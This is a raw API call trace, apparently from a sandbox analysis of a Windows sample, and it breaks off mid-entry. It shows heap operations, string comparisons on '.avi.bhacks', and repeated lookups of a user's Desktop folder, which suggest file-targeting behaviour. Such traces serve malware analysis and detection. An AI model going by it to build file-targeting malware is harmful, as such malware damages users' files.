[0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0104.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0104.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0104.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa65a0 [0104.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa65a0 | out: hHeap=0x2af0000) returned 1 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b80 | out: hHeap=0x2af0000) returned 1 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0104.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0104.702] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0104.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0104.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0104.702] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0104.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0104.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0104.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0104.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0104.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0104.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0104.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0104.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0104.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0104.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0104.703] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0104.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9040 [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0104.703] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6680 [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0104.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0104.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0104.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0104.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0104.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0104.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0104.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0104.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0104.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75498 [0104.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6680 | out: hHeap=0x2af0000) returned 1 [0104.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0104.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0104.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0104.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71eb8 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0104.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0104.704] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0104.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0104.704] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6760 [0104.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0104.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0104.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0104.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0104.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0104.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0104.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0104.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0104.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0104.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0104.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0104.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0104.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6760 | out: hHeap=0x2af0000) returned 1 [0104.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0104.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0104.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0104.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0104.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71e88 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0104.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ea8 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0104.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0104.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0104.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0104.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0104.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0104.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0104.707] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0104.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0104.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0104.707] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0104.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0104.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0104.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0104.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0104.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0104.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0104.708] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0104.708] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0104.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0104.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0104.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0104.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0104.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0104.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0104.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0104.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.709] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0104.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0104.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0104.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0104.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0104.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0104.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0104.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0104.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0104.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0104.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0104.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0104.710] HeapFree (in: hHeap=0x2af0000, 